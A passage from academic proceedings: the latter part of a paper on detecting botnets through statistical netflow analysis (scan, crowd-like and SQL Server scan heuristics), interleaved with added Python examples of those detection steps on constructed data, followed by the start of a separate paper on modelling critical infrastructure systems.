independent, bots behave like a single intelligent entity. This synchronized and related behavior must<br />
exist so the botnet can be useful to the botmaster (from scan to attack activity). Thus, similar and<br />
synchronized network traffic should be strong evidence of botnet activity.<br />
4.3 Netflows numerical and statistical analysis<br />
Several numerical properties are available in network flows, or can be easily derived, in order to detect<br />
botnet activity. Basic attributes of most netflow formats include flow start and end time, source IP and<br />
port, destination IP and port, bytes and packets in the flow, as well as the protocol used. The numerical<br />
analysis of netflows must, then, be based on the study of such attributes and their possible<br />
relations/dependencies. All these attributes can be used to cluster collected netflows or calculate a host’s<br />
associated entropy.<br />
Clustering can be based on simple attributes or on composed ones. Some examples of composed<br />
attributes are the bytes per packet, bytes per source host, or the flow time interval by host, among others.<br />
Several classification and clustering methods can be used. K-means and X-means (G. Gu, Perdisci, et al.<br />
2008), Cosine distance, Euclidean distance, Earth Mover’s distance (EMD), Kullback-Leibler asymmetric<br />
distance, term frequency / inverse document frequency (TF/IDF), J48 decision trees, Naïve Bayes and<br />
Bayesian Networks (Karasaridis et al. 2007) are some of them.<br />
Entropy estimation is also useful for botnet detection in that it can tell how much randomness is<br />
involved in the traffic observed. Hosts behaving similarly will have equivalent entropy values. Bot scan<br />
activity, for example, will certainly have low IP/port distribution entropy. Shannon’s entropy or other<br />
generalized entropies such as those defined by Renyi and Tsallis can be used in traffic characterization and<br />
anomaly detection (Tellenbach et al. 2009). Tsallis entropy is given by the following expression:<br />
Since Tsallis entropy is better suited for non-Gaussian measures (Tellenbach et al. 2009) it will be used<br />
in this study to analyze contacted IPs and ports, connection time intervals and bytes/packets per flow.<br />
After clustering or entropy calculations are made, thresholds must be applied in order to define which<br />
host or traffic represents an anomalous event. This selection is prone to produce type I and II statistical<br />
errors, represented in the form of false positive and false negative rates.<br />
Thus, both parameter and threshold definitions play a critical role in detection<br />
efficiency, in particular in false alarms and missed detections and the balance between false positives and<br />
negatives.<br />
4.4 Analysis framework<br />
In order to develop and test the proposed heuristics, several tools were used: Nfdump project tools<br />
(Nfdump 2010) allowed the capture and <strong>in</strong>itial flow pars<strong>in</strong>g; Microsoft SQL Server (Microsoft 2011c),<br />
Analysis Services (Microsoft 2011a) and Report<strong>in</strong>g Services (Microsoft 2011b) provided flow storage,<br />
process<strong>in</strong>g, chart<strong>in</strong>g and statistical analysis; and, f<strong>in</strong>ally, BotAnalytics (developed <strong>in</strong> C# dur<strong>in</strong>g this<br />
research) allowed the import of all collected netflows <strong>in</strong>to an SQL Server database.<br />
To allow the injection of bot traffic (currently only available in pcap dump format) into the netflow database, a feature was implemented in BotAnalytics that permitted the conversion of dump capture files into flows and their corresponding insertion into the SQL Server database. This conversion was made by aggregating the captured packets into a unidirectional five-tuple record (Source IP, Source Port, Destination IP, Destination Port and Protocol) with the corresponding number of packets, bytes, and start and end time of the flow. A flow aging mechanism was also introduced in the pcap dump import feature that automatically determined the end of a flow when, for an active five-tuple record, a packet wasn't seen for at least sixty seconds.
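The five-tuple aggregation and sixty-second aging rule described above, as an added example (not BotAnalytics code) run over a constructed packet list; it assumes the capture is ordered by timestamp, as packets in a dump file are.

```python
"""Unidirectional five-tuple flow aggregation with a sixty-second aging rule.

Added example (not BotAnalytics code) reproducing the pcap import step on a
constructed packet list. Assumption: the capture is already ordered by
timestamp, as packets in a dump file are.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

IDLE_TIMEOUT = 60.0   # seconds without a packet before an active five-tuple is closed

FiveTuple = Tuple[str, int, str, int, str]   # (src IP, src port, dst IP, dst port, protocol)


@dataclass
class Flow:
    key: FiveTuple
    packets: int
    bytes: int
    start: float
    end: float


def aggregate(packets) -> List[Flow]:
    """packets: iterable of (timestamp, src, sport, dst, dport, proto, length).
    Returns the completed flows ordered by start time."""
    active: Dict[FiveTuple, Flow] = {}
    done: List[Flow] = []
    for ts, src, sport, dst, dport, proto, length in packets:
        key = (src, sport, dst, dport, proto)
        flow = active.get(key)
        # Aging: a gap of at least sixty seconds ends the old flow and starts a new one.
        if flow is not None and ts - flow.end >= IDLE_TIMEOUT:
            done.append(active.pop(key))
            flow = None
        if flow is None:
            active[key] = Flow(key, 1, length, ts, ts)
        else:
            flow.packets += 1
            flow.bytes += length
            flow.end = ts
    done.extend(active.values())   # end of capture closes whatever is still active
    done.sort(key=lambda f: (f.start, f.key))
    return done


# Constructed packets: one web exchange that pauses for 65 s, plus a DNS query.
SAMPLE_PACKETS = [
    (0.0,  "10.0.0.5", 40000, "192.0.2.10", 80, "tcp", 60),
    (0.5,  "10.0.0.5", 40000, "192.0.2.10", 80, "tcp", 1400),
    (1.0,  "192.0.2.10", 80, "10.0.0.5", 40000, "tcp", 60),   # reverse direction: its own flow
    (30.0, "10.0.0.5", 40000, "192.0.2.10", 80, "tcp", 60),
    (95.0, "10.0.0.5", 40000, "192.0.2.10", 80, "tcp", 60),   # 65 s of silence: a new flow
    (96.0, "10.0.0.7", 53001, "192.0.2.53", 53, "udp", 70),
]


if __name__ == "__main__":
    for f in aggregate(SAMPLE_PACKETS):
        print(f.key, f.packets, f.bytes, f.start, f.end)
```

Note that the reverse direction of the same TCP connection becomes a separate flow, so a bidirectional exchange always yields two records.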
The (initially assumed benign) traffic datasets used in this research were captured in the University of Minho network edge. They were collected and parsed using nfdump tools before being imported into the SQL database by BotAnalytics (internal proxy and DNS servers traffic was excluded at this time for the sake of analysis simplicity). Nfdump tools were installed in a server connected to a mirrored port of a switch at the edge of the campi network. All traffic entering and leaving the university's network was captured.
All this initial heuristic validation and development was made on a specific dataset representing the University of Minho UDP and TCP traffic on the 11th January 2011. More than thirty million flows were imported, at this time, into the SQL Server database.
4.5 Scan detection heuristic
Scan detection is a common feature in IDS systems. Many detection approaches can be implemented using statistical flow analysis. This paper presents one of the approaches currently
Luís Mendonça and Henrique Santos<br />
under study. The goal of scan detection in the context of botnet activity detection is the identification of suspicious hosts that can later be observed in more detail applying, cumulatively, a wider set of heuristics in order to identify a botnet and its constituent hosts.
Modeling scan behavior was the first step taken to develop detection-capable heuristics. Scan activity flows were assumed to have small packets (few bytes) with a high number of destination ports and IPs involved within a relatively short period of time. In order to verify this behavior on the captured traffic, for each source IP and ten-minute period, the number of distinct IPs and ports was counted. The result was then filtered using the Distinct Destination IPs (DDIP) and Port/IP Ratio (PIR) thresholds. PIR is calculated by dividing the number of distinct ports by the number of distinct IPs contacted. These criteria preserved only flows with a high number of distinct destination IPs and ports contacted. The result was then filtered by a Bytes/Packets Ratio (BPR) threshold, aiming to keep only traffic with small packets involved. The chart presented in Figure 1 shows the number of distinct source IPs with scan-like activity. It was built with a BPR of 100 bytes, and both DDIP and PIR of 5.
Figure 1: Number of distinct hosts with scan-like activity
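The DDIP, PIR and BPR filtering just described, as an added example (not the authors' BotAnalytics or SQL Server logic) applied to constructed flows with the thresholds quoted above; it assumes DDIP and PIR are inclusive lower bounds and BPR an inclusive upper bound.

```python
"""Scan-like activity heuristic: DDIP, PIR and BPR thresholds per source IP
and ten-minute period.

Added example, not the authors' BotAnalytics or SQL Server logic. Assumption:
the DDIP and PIR thresholds are lower bounds and the BPR threshold is an
upper bound, all inclusive.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

PERIOD = 600          # ten-minute analysis window, in seconds
DDIP_MIN = 5          # distinct destination IPs contacted
PIR_MIN = 5.0         # distinct ports / distinct IPs
BPR_MAX = 100.0       # bytes per packet; scans use small packets

# flow: (timestamp, src_ip, src_port, dst_ip, dst_port, proto, packets, bytes)
Flow = Tuple[float, str, int, str, int, str, int, int]


def scan_metrics(flows: List[Flow]) -> Dict[Tuple[str, int], dict]:
    """Per (source IP, period): distinct destination IPs, PIR and BPR."""
    ips, ports = defaultdict(set), defaultdict(set)
    pkts, nbytes = defaultdict(int), defaultdict(int)
    for ts, src, _, dst, dport, _, p, b in flows:
        key = (src, int(ts // PERIOD))
        ips[key].add(dst)
        ports[key].add(dport)
        pkts[key] += p
        nbytes[key] += b
    return {
        key: {
            "ddip": len(ips[key]),
            "pir": len(ports[key]) / len(ips[key]),
            "bpr": nbytes[key] / pkts[key],
        }
        for key in ips
    }


def scan_like(flows: List[Flow]) -> List[Tuple[str, int]]:
    """(source IP, period) pairs passing the DDIP, PIR and BPR filters, as counted in Figure 1."""
    return sorted(
        key for key, m in scan_metrics(flows).items()
        if m["ddip"] >= DDIP_MIN and m["pir"] >= PIR_MIN and m["bpr"] <= BPR_MAX
    )


def build_sample() -> List[Flow]:
    """Constructed period 0: one vertical scanner, one normal client and one
    single-port horizontal scanner (which this heuristic lets through)."""
    flows: List[Flow] = []
    # 10.0.0.9 probes 5 ports on each of 6 hosts with single 60-byte packets.
    for i in range(6):
        for p in range(5):
            flows.append((10.0 + i, "10.0.0.9", 50000 + i, f"198.51.100.{i + 1}",
                          1000 + i * 5 + p, "tcp", 1, 60))
    # 10.0.0.5 talks HTTPS to two servers with large packets: BPR far above 100.
    flows.append((20.0, "10.0.0.5", 41000, "203.0.113.8", 443, "tcp", 40, 30000))
    flows.append((25.0, "10.0.0.5", 41001, "203.0.113.9", 443, "tcp", 12, 9000))
    # 10.0.0.12 tries port 22 on 50 hosts: DDIP is high but PIR is only 1/50.
    for i in range(50):
        flows.append((30.0 + i, "10.0.0.12", 51000 + i, f"198.51.100.{100 + i}",
                      22, "tcp", 1, 60))
    return flows
```

The single-port horizontal scanner in the sample passes unflagged because PIR stays far below 5, which is one reason narrowing the analysis to specific application ports, as done later for SQL Server, gives better results.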
The development of this initial scan heuristic allowed closer contact with the problem but did not, per se, bring forward anomalous activity. Better results were achieved when aiming the study at specific application traffic, as seen in the last heuristic presented in this paper.
4.6 Crowd-like behavior heuristic
The crowd-like behavior heuristic was developed with the following observation in mind: flows with the same number of bytes and packets sent from many distinct hosts, during a relatively small time interval, are possibly related and very alike to what botnet activity would produce. Based on this assumption, and for each ten-minute period, all the UDP and TCP flows with less than 1000 bytes and with the same number of packets and bytes were grouped. At this stage, every source IP with only one packet in the cluster was removed in order to filter out IPs with a small contribution to the cluster. The 1000-byte limit selection was based on the assumption that botnet communication is based on small packet exchanges (Strayer et al. 2008). Large bandwidth is commonly associated with bulk transfers or downloads. The resulting clusters thus contained hosts with similar flow characteristics. The next step was to eliminate the clusters having less than five IPs. This threshold criterion was assumed after analyzing the resulting clusters' content. Port usage analysis made clear that a vast majority of their flows were related to NTP and DNS usage, making such clusters not important to this analysis.
Some clusters were then excluded based on their relevance. A cluster was considered relevant if its information was useful. Clusters with the majority of the source IPs seen in the ten-minute period could not be considered relevant since they probably contained normal traffic. For this matter, an Environment Ratio (ER) and Threshold (ET) were defined. ER was determined by the ratio between distinct hosts in the cluster versus the total distinct hosts in the ten-minute period under analysis. The ET used in this initial research was 0.001 and it was selected after carefully analyzing the clusters created and verifying again that clusters having ER higher than the selected ET (0.001) represented normal traffic (DNS, NTP).
Figure 2 shows a chart representing the number of distinct source IPs (size of the bubbles) with filtered flows having the same number of bytes and packets between 12:05 and 12:15 of the 11th January 2011. Two quick remarks can be made whilst observing the chart: no flows could be found with less than 378 bytes and more than 8 packets, and there were large clusters in the bottom left corner of the chart revealing the existence of many hosts with similar flows having few, small packets.
Figure 2: Distinct source IPs per number of bytes and packets
Finally, and for a ten-minute period, a Clustering Score (CT) was determined for each IP. CT was calculated by counting the number of crowd-like clusters an IP belonged to. All the IPs with a CT below 5 and, thus, with less crowd-like behavior, were filtered out at this stage. All the thresholds and corresponding values presented here were used mainly for model and heuristic validation and are still under analysis. The chart in Figure 3 shows, for each ten-minute period, the number of distinct source IPs belonging to suspicious clusters. Each of these hosts thus possesses crowd-like behavior.
Figure 3: Number of distinct source IPs with crowd-like behavior per ten-minute period
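The whole crowd-like pipeline of Section 4.6 (grouping by identical packets and bytes, dropping single-packet contributors, the five-IP minimum, the ER/ET filter and the CT score) carried out over one constructed ten-minute period, as an added example rather than the authors' BotAnalytics implementation; it assumes inclusive thresholds and that the ER denominator counts every source IP seen in the period, including hosts whose flows exceed 1000 bytes.

```python
"""Crowd-like behaviour heuristic applied to one ten-minute period.

Added example, not the authors' BotAnalytics code. Assumptions: thresholds
are inclusive, and the ER denominator counts every source IP seen in the
period, including hosts whose flows exceed the 1000-byte limit.
"""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

MAX_BYTES = 1000      # flows at or above this are treated as bulk transfers
MIN_CLUSTER_IPS = 5   # clusters with fewer distinct IPs are dropped
ET = 0.001            # Environment Threshold applied to the Environment Ratio (ER)
MIN_CT = 5            # Clustering Score: crowd-like clusters an IP must belong to

# flow: (src_ip, proto, packets, bytes)
Flow = Tuple[str, str, int, int]
Cluster = Tuple[int, int]   # (packets, bytes)


def crowd_like_hosts(flows: List[Flow]) -> Tuple[List[str], Dict[Cluster, Set[str]]]:
    """Return (IPs with crowd-like behaviour, surviving clusters with their members)."""
    total_hosts = len({f[0] for f in flows})
    # Steps 1 and 2: group small TCP/UDP flows by identical (packets, bytes),
    # summing each source IP's packets inside the cluster.
    clusters: Dict[Cluster, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for src, proto, pkts, nbytes in flows:
        if proto in ("tcp", "udp") and nbytes < MAX_BYTES:
            clusters[(pkts, nbytes)][src] += pkts
    surviving: Dict[Cluster, Set[str]] = {}
    for key, per_ip in clusters.items():
        # Step 3: an IP with a single packet contributed little; drop it.
        members = {ip for ip, p in per_ip.items() if p > 1}
        # Step 4: clusters with fewer than five IPs are not crowds.
        if len(members) < MIN_CLUSTER_IPS:
            continue
        # Step 5: a cluster holding too large a share of all hosts is normal
        # traffic (DNS, NTP), so keep only ER <= ET.
        if len(members) / total_hosts > ET:
            continue
        surviving[key] = members
    # Step 6: CT counts the surviving clusters each IP belongs to.
    ct: Dict[str, int] = defaultdict(int)
    for members in surviving.values():
        for ip in members:
            ct[ip] += 1
    flagged = sorted(ip for ip, score in ct.items() if score >= MIN_CT)
    return flagged, surviving


def build_sample() -> List[Flow]:
    """Constructed period: six synchronised hosts, one straggler present in only
    four of their clusters, an NTP-like crowd of 100 hosts, and 8000 background
    hosts sending bulk flows."""
    flows: List[Flow] = []
    patterns = [(2, 120), (2, 180), (3, 240), (3, 300), (4, 400)]
    for i in range(1, 7):
        for pkts, nbytes in patterns:
            flows.append((f"10.1.0.{i}", "tcp", pkts, nbytes))
        flows.append((f"10.1.0.{i}", "udp", 1, 60))   # single packet: removed in step 3
    for pkts, nbytes in patterns[:4]:                 # four clusters only: CT stays below 5
        flows.append(("10.1.0.99", "tcp", pkts, nbytes))
    for i in range(100):                              # ER about 0.012: dropped in step 5
        flows.append((f"10.2.0.{i}", "udp", 2, 152))
    for i in range(8000):                             # large flows, never clustered
        flows.append((f"10.3.{i // 256}.{i % 256}", "tcp", 40, 50000 + i))
    return flows
```

Because ER is a fraction of all hosts in the period, a five-IP cluster only survives ET = 0.001 when the period holds at least 5000 distinct source IPs, which is why the sample carries a large background population.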
This data brought forward some interesting events when drilled down. The majority of the hosts detected with crowd-like behavior revealed a high connection rate on unusual ports and to geographically dispersed IPs. Further investigation is now necessary to distinguish whether these anomalous flows represented malicious activities.
4.7 Crowd-like SQL server scan behavior heuristic
The last heuristic presented is a much more targeted one since it is directed to a specific protocol and application behavior analysis. SQL is a very important source of application vulnerabilities, which makes SQL Server port scans very common. An existing buffer overflow bug in Microsoft SQL Server turned this application into the spreading vehicle for the Slammer worm, for example.
The goal of this analysis was to model specific scan behaviors. To find out if (and how) SQL Server oriented scan activity was being carried out in the campus network, all the flows not directed to SQL Server ports (1423 and 1433) or with more than 1000 bytes were filtered out. Note that, according to the university's security policy, the existence of SQL Server connections with hosts outside the university's network would be anomalous.
Several such scans were found on the 11th of January 2011. The chart in Figure 4 shows the number of distinct IPs with connections (or attempts) to SQL Server ports, related to the average bytes per packet used in the connection, during the day. It was possible to observe that most scan traffic had a small bytes per packet ratio (BPR) and that this ratio did not go beyond 300 bytes.
Figure 4: Number of distinct hosts connecting to SQL server ports per bytes per packet
Table 1: Top 5 bytes per packet clusters with higher SQL Server scan activity
Bytes per Packet    Number of Distinct source IPs
48                  426
40                  49
52                  25
44                  10
46                  7
The following step was to analyze in detail each host involved in the scanning, trying to model scan activities and, at the same time, detect crowd-like behaviors. Three important scan methodologies were found in the analysis of this traffic dataset: aggressive (ten thousand IPs scanned in ten minutes by one single host), constant (nine IPs scanned throughout the day in each ten-minute period by a single host) and distributed (more than forty hosts scanning different sets of IPs at a rate of one IP scanned per five-minute period).
A crowd-like behavior could be established in this distributed scanning. Besides having a time-related correlation (a fixed five-minute scanning interval), all of the hosts were geographically close and scanned different sets of IPs. This last characteristic was the final proof of their cooperative behavior.
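The SQL Server port filter, the bytes-per-packet clustering behind Table 1 and a check for the distributed pattern just described (hosts sharing one fixed probe interval whose target sets do not overlap), as an added example that is not the authors' code; it assumes integer division for bytes per packet, a one-second tolerance for "fixed interval", and that two or more such hosts with pairwise-disjoint targets form a crowd.

```python
"""SQL Server scan flows: bytes-per-packet clusters (the layout of Table 1)
and the distributed crowd-like scan check of Section 4.7.

Added example, not the authors' code. Assumptions: a flow is
(timestamp_s, src_ip, dst_ip, dst_port, packets, bytes); bytes per packet
uses integer division; a "fixed interval" means all gaps between a host's
successive probes agree within one second; a distributed crowd is two or
more hosts sharing that interval whose target sets are pairwise disjoint.
"""
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

SQL_PORTS = {1423, 1433}    # the SQL Server ports quoted in the paper
MAX_BYTES = 1000            # larger flows are not probes
GAP_TOLERANCE = 1.0         # seconds; assumption

Flow = Tuple[float, str, str, int, int, int]


def sql_scan_flows(flows: List[Flow]) -> List[Flow]:
    """Keep only small flows directed at SQL Server ports."""
    return [f for f in flows if f[3] in SQL_PORTS and f[5] < MAX_BYTES]


def bpr_clusters(flows: List[Flow]) -> List[Tuple[int, int]]:
    """(bytes per packet, distinct source IPs), largest clusters first."""
    per_bpr: Dict[int, set] = defaultdict(set)
    for _, src, _, _, pkts, nbytes in flows:
        per_bpr[nbytes // pkts].add(src)
    return sorted(((bpr, len(ips)) for bpr, ips in per_bpr.items()),
                  key=lambda item: (-item[1], item[0]))


def probe_interval(timestamps: List[float]) -> Optional[int]:
    """The fixed gap (seconds) between a host's probes, or None if the gaps
    vary or there are too few probes to judge."""
    ts = sorted(timestamps)
    if len(ts) < 3:
        return None
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if max(gaps) - min(gaps) > GAP_TOLERANCE:
        return None
    return round(sum(gaps) / len(gaps))


def distributed_scanners(flows: List[Flow]) -> Dict[int, List[str]]:
    """Hosts probing at one shared fixed interval with non-overlapping targets,
    keyed by that interval."""
    times: Dict[str, List[float]] = defaultdict(list)
    targets: Dict[str, set] = defaultdict(set)
    for ts, src, dst, _, _, _ in flows:
        times[src].append(ts)
        targets[src].add(dst)
    by_interval: Dict[int, List[str]] = defaultdict(list)
    for src, ts in times.items():
        interval = probe_interval(ts)
        if interval is not None:
            by_interval[interval].append(src)
    crowds: Dict[int, List[str]] = {}
    for interval, hosts in by_interval.items():
        disjoint = [h for h in hosts
                    if all(targets[h].isdisjoint(targets[o]) for o in hosts if o != h)]
        if len(disjoint) >= 2:
            crowds[interval] = sorted(disjoint)
    return crowds


def build_sample() -> List[Flow]:
    """Constructed flows: three hosts probing every 300 s with disjoint targets,
    one host probing at irregular gaps, and two flows the filter must drop."""
    flows: List[Flow] = []
    for h in range(1, 4):
        for j in range(4):
            flows.append((300.0 * j, f"10.5.0.{h}", f"203.0.113.{h * 10 + j}", 1433, 1, 48))
    for j, ts in enumerate((0.0, 40.0, 100.0, 130.0, 220.0)):
        flows.append((ts, "10.5.0.9", f"203.0.113.{200 + j}", 1433, 1, 40))
    flows.append((5.0, "10.5.0.20", "203.0.113.250", 80, 1, 48))       # not a SQL port
    flows.append((6.0, "10.5.0.21", "203.0.113.251", 1433, 10, 5000))  # bulk transfer
    return flows
```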
4.8 Detection model
The botnet detection model under study is currently considered to be based on two vectors: scanning activity and crowd-like behaviors analysis. Suspicious hosts are first identified by the scan activity vector so they can have their network behavior thoroughly analyzed. Botnet activity identification is made whenever synchronized and similar flows are exchanged by many different suspicious hosts.
This model has the potential to detect all types of botnets. Traffic features such as the size and number of packets can be used to detect bot activity or crowd-behavior in both centralized and decentralized botnet topologies.
5. Conclusions and future work
A hard and winding road still lies ahead, but the preliminary results achieved are great contributions to a better knowledge of the problem. It was proved, though, that it is possible to detect network anomalies by solely analyzing netflow attributes.
The biggest challenges found up to this moment were collecting, filtering and analyzing large traffic datasets. Many different netflow formats were found in the first datasets collected (nfdump, flow-tools (Flow-tools 2010) and others), which made their study a hard task. New tools must now be tested and, perhaps, developed in order to simplify such tasks.
For the sake of system configuration and management, more thresholds must also be defined to allow the adaptation of present and future heuristics to different supervised networks. Every network administrator must have in mind that these threshold configurations are very sensitive and should be correctly defined in order to balance true and false positive detection rates.
Although the heuristics proposed in this paper lack further investigation and development, they were able to pinpoint some important network events that, when drilled down, presented real deviations from the normal network traffic. To determine whether such anomalies represent real, botnet-related, malicious traffic is still work to be done.
The greatest contribution made by this initial analysis to future work was the conclusion that the search for network anomalies must be oriented by a previous classification and characterization of the traffic under analysis (protocols and ports, for example). The search for a wide-spectrum anomaly model is prone to failure since each protocol and application has its own specific behaviors. In nature, it would be like finding animal anomalies by simply checking a predetermined characteristic like the existence of fur. The absence of fur is normal in some animals but not in others.
The injection of real bot traffic will certainly be a necessary step to further validate and enhance the currently proposed heuristics as well as to establish new ones.
Next steps will include the development of new robust application-oriented heuristics, the creation of an effective event drill-down algorithm with false positive rate reduction in mind and, finally, a botnet host identification method based on such algorithms.
The development of new tools and methods is also needed in order to allow real implementations of a system. The defined test bed and the tools used and developed (BotAnalytics, Reports and Analysis Services Projects) were important for off-line analysis and understanding of the botnet traffic phenomenon but not quite efficient for real-time detection.
Even if the detection systems developed are not enough to stop botnet activity, perhaps there will be a point in time where the investment made in building a botnet won't pay off any more. This is the greatest motivation of this research.
In the end, it will be virtually impossible to detect a botnet whose bots mimic normal host behavior. But a bot behaving as a normal host can't be that malicious.
Acknowledgements
This research has been possible thanks to the cooperation of the Communications Services of the University of Minho.
References
Akiyama, M., 2007. A proposal of metrics for botnet detection based on its cooperative behavior. 2007 International Symposium on Applications and the Internet Workshops (SAINTW'07).
Bailey, M. et al., 2009. A survey of botnet technology and defenses. In Conference For Homeland Security, 2009. CATCH'09. Cybersecurity Applications & Technology. IEEE, p. 299–304.
Choi, H., Lee, H. & Kim, H., 2007. Botnet detection by monitoring group activities in DNS traffic. In Computer and Information Technology, 2007. CIT 2007. 7th IEEE International Conference on. IEEE, p. 715–720.
Dagon, D. & Gu, G., 2007. A taxonomy of botnet structures. Twenty-Third Annual Computer Security Applications Conference (ACSAC 2007).
Estrada, V.C. & Nakao, A., 2010. A Survey on the Use of Traffic Traces to Battle Internet Threats. 2010 Third International Conference on Knowledge Discovery and Data Mining.
Flow-tools, 2010. Flow-tools project webpage. Available at: http://code.google.com/p/flow-tools/ [Accessed January 3, 2011].
Gu, G. et al., 2008. BotMiner: Clustering analysis of network traffic for protocol- and structure-independent botnet detection. In Proceedings of the 17th conference on Security symposium. USENIX Association, p. 139–154.
Gu, G., Zhang, J. & Lee, W., 2008. BotSniffer: Detecting botnet command and control channels in network traffic. In Proceedings of the 15th Annual Network and Distributed System Security Symposium (NDSS'08).
Gu, G. et al., 2007. BotHunter: detecting malware infection through IDS-driven dialog correlation. In Proceedings of 16th USENIX Security Symposium on USENIX Security Symposium. Berkeley: USENIX Association, p. 12:1–12:16.
Jing, L. et al., 2009. Botnet: Classification, attacks, detection, tracing, and preventive measures. EURASIP Journal on Wireless Communications and Networking, 2009.
Karasaridis, A., Rexroad, B. & Hoeflin, D., 2007. Wide-scale botnet detection and characterization. In Proceedings of the first conference on First Workshop on Hot Topics in Understanding Botnets. USENIX Association, p. 7.
Kim, I., Choi, H. & Lee, H., 2009. BotXrayer: Exposing Botnets by Visualizing DNS Traffic.
Lu, W. & Tavallaee, M., 2009. BotCop: An online botnet traffic classifier. 2009 Seventh Annual Communications Networks and Services Research Conference.
Microsoft, 2011a. Microsoft Analysis Services 2008. Available at: http://www.microsoft.com/sqlserver/2008/en/us/analysis-services.aspx [Accessed January 5, 2011].
Microsoft, 2011b. Microsoft Reporting Services 2008. Available at: http://www.microsoft.com/sqlserver/2008/en/us/reporting.aspx [Accessed January 5, 2011].
Microsoft, 2011c. Microsoft SQL Server 2008. Available at: http://www.microsoft.com/sqlserver/en/us/default.aspx [Accessed January 5, 2011].
Mielke, C. & Chen, H., 2008. Botnets, and the cybercriminal underground. In Intelligence and Security Informatics, 2008. ISI 2008. IEEE International Conference on. IEEE, p. 206–211.
Morales, J.A. et al., 2010. Analyzing DNS activities of bot processes. In Malicious and Unwanted Software (MALWARE), 2009 4th International Conference on. IEEE, p. 98–103.
Nfdump, 2010. Nfdump tools webpage. Available at: http://nfdump.sourceforge.net/ [Accessed January 3, 2011].
Strayer, W.T. et al., 2008. Botnet detection based on network behavior. Botnet Detection, p. 1–24.
Tellenbach, B. et al., 2009. Beyond Shannon: Characterizing internet traffic with generalized entropy metrics. Passive and Active Network Measurement.
Villamarin-Salomón, R. & Brustoloni, J.C., 2008. Identifying botnets using anomaly detection techniques applied to DNS traffic. In Consumer Communications and Networking Conference, 2008. CCNC 2008. 5th IEEE. IEEE, p. 476–481.
Zhu, Z. et al., 2008. Botnet research survey. In Computer Software and Applications, 2008. COMPSAC'08. 32nd Annual IEEE International. IEEE, p. 967–972.
Analysis and Modelling of Critical Infrastructure Systems
Graeme Pye and Matthew Warren
Deakin University, Geelong, Australia
graeme@deakin.edu.au
mwarren@deakin.edu.au
Abstract: The increasing complexity and interconnectedness of critical infrastructure systems, including the information systems and communication networks that support their existence and functionality, poses questions and challenges, particularly in terms of modelling and analysis of the security, survivability and ultimately reliability and continued availability of critical infrastructure systems and the services they deliver to modern society. The focus of this research enquiry is with regard to critiquing and modelling critical infrastructure systems. There are numerous systems analysis and modelling approaches that outline any number of differing methodological approaches, each with their own characteristics, expertise, strengths and weaknesses. The intention of this research is to investigate the merit of applying a 'softer' approach to critical infrastructure system security analysis and modelling that broadly views the systems in holistic terms, including their relationships with other systems. The intention is not to discuss or criticise existing research applying quantitative approaches, but to discuss a 'softer' system analysis and modelling approach in a security context that is adaptable to analysis modelling of critical infrastructure systems.
Keywords: critical infrastructure, security analysis, systems modelling
1. Introduction
The interactive nature and characteristics of critical infrastructure systems present several theoretical and practical challenges to modelling, prediction, simulation and analysis of the causal behaviours and security factors both within and between mixes of differing system types. Furthermore, understanding the potential impacts of interdependency relationships as infrastructures evolve and change in operational regulations governing critical infrastructure systems is an important consideration (Brown et al 2004). The interactions and responses are neither universally applicable nor transferable between independent, single critical infrastructure systems or interconnected multiple system configurations. Critical infrastructure systems comprise a heterogeneous mixture of dynamic, interactive, non-linear elements, unscheduled discontinuations and numerous other influential impositions and behaviours (Macdonald & Bologna 2003). These configurations and behaviours present significant challenges to the security analysis and modelling of critical infrastructure systems.
2. System analysis and modelling considerations
Systems generally consist of a collection of lower level elements or subsystems that work together in a cooperative manner toward the greater overarching goal of the system. Furthermore, the characteristics of systems vary considerably and are largely the result of the type of system, open or closed, and the external environment that interacts with and influences system functionality generally. Additionally, the relationships and influences exerted between subsystems also have a part to play in comprehending the subject system's functionality and responses to differing circumstances.
2.1 System modelling themes
In general terms, applying the system security analysis or system modelling approaches to represent an interpretive conceptualisation of a real-world system (Berntsen et al nd) provides a means of viewing the important aspects or essence of the system at various levels, depending on the particular system modelling theme.
For example, other common system modelling and analysis themes are as follows (Avison 2003a):
A three-level view, where the conceptual level is a descriptive high-level overview of the system domain, the logical level describes the system goals and intention, while the physical level describes the system itself including the technologies involved.
Process modelling theme describes the logical analysis of the processes within the system and is a discipline that applies a basic technique of functional decomposition, which breaks down a complex problem into smaller, more manageable detail.
Data analysis theme involves comprehending and documenting the data elements and their relationships within the system.
Object-orientated theme models objects that represent elements of the system including people, data, processes and the interaction of these objects.
These themes are each applicable to general system analysis or modelling in terms of their specific characteristics of application; however, there is no single theme directly applicable to critiquing and modelling critical infrastructure systems.
2.2 Blending methodological approaches
As Avison (2003b) outlines, methodologies provide a set of detailed rules and guidelines to follow and work to that deliver a highly structured design approach to the specific task they are to address. Therefore, the logical extension lies in utilising a number of individual themes or approaches in combination, to bring together characteristics of each specific method to provide specific expertise to meet the overall practical criteria and intention of critiquing and modelling critical infrastructure systems (Wood-Harper et al 1985).
Therefore, a blended methodological approach utilising multiple system analysis and system modelling approaches in combination would conceivably bring together the characteristics of each that are applicable to achieving the overall goal of critiquing and modelling critical infrastructure systems.
2.3 System analysis modelling
Other modelling approaches related to information system analysis that Dennis et al (2009) discuss are as follows:
Functional modelling is a description of the processes and the interaction of the system with its environment.
Structural modelling is a conceptual description of the structure of the data supporting the processes and presents the logical organisation of data without focussing on the technical details of how the data is stored, created or manipulated.
Behavioural modelling describes the internal dynamic aspects of a system that support the processes by describing the internal logic of the processes without specifying the process implementation.
While these approaches may not necessarily be directly applicable to this research in terms of critiquing and modelling critical infrastructure systems, there are elements of these approaches that are complementary to system analysis and the principles of system modelling.
The principal intention of system security analysis is to determine an intricate understanding of the focal systems to identify and monitor potential system vulnerabilities and develop solutions. An additional approach to enhance the insights gained from system analysis into the functional characteristics, security and structural features of systems is to develop a model of the subject system that conceptually represents the focal, real-world system of interest for further investigation.
3. Analysis and modelling: The challenges
